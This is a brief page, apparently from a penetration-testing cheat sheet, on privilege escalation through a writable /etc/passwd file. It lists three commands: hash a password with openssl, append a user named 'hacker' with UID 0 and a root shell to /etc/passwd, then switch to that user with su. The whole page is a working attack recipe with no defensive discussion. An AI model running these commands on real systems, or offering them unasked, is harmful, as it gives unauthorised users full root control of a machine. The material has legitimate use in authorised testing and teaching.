Abusing Password Authentication

NOTE: Ensure that user has writable permission to /etc/passwd

1

Create hashed password

openssl passwd "<Password>"
2

Add user into /etc/passwd

echo "hacker:<Hashed Password>:0:0:root:/root:/bin/bash" >> /etc/passwd
3

Privilege Escalate

su hacker
PreviousAbusing Cron JobsNextAbusing Setuid Binaries and Capabilities

Last updated